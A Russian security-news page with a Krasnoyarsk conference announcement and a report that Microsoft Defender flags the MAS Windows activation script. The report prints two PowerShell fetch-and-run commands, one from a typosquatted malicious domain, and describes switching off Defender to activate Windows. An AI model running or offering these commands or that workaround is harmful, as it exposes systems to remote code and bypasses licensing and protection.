Код ИБ в Красноярске расскажет о реагировании на ИБ-инциденты

Код ИБ в Красноярске расскажет о реагировании на ИБ-инциденты

Код ИБ в Красноярске расскажет о реагировании на ИБ-инциденты

Вот уже в четвертый раз 5 сентября в Красноярске пройдет ежегодная конференция по кибербезопасности “Код ИБ”. Главной темой дискуссии, которая состоится в начале конференции, станет реагирование на ИБ-инциденты.

Часто причиной возникновения ИБ-инцидентов в компании становятся ее сотрудники. Тему контроля и обучения персонала как фактора уязвимости раскроет секция “Люди”. В ее рамках прозвучат доклады таких компаний как StaffCop, SearchInform и Ростелеком-Солар.

Спикеры, в числе которых Дмитрий Стельченко и Дмитрий Абалмасов, расскажут участникам конференции о современных решениях в области обеспечения норм внутренней безопасности предприятий, приведут примеры из практики.

Руководителям и специалистам, чья область интересов лежит в сфере соблюдения технических правил ИБ, будет интересна секция “Технологии”. На ней участники смогут услышать выступления представителей известных вендоров и интеграторов: Конфидент, НумаТех, Доктор Веб, КриптоПро.

Евгений Мардыко (Конфидент) поделится практическими кейсами о защите конечных точек, Вячеслав Медведев (Доктор Веб) приведет примеры атак, которые прошли незамеченными для ИБ-специалистов, Павел Луцик (КриптоПро) расскажет об обеспечении защиты удаленного доступа.

Подать заявку на бесплатное участие в конференции можно уже сейчас на сайте https://krasnoyarsk.codeib.ru/ 

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru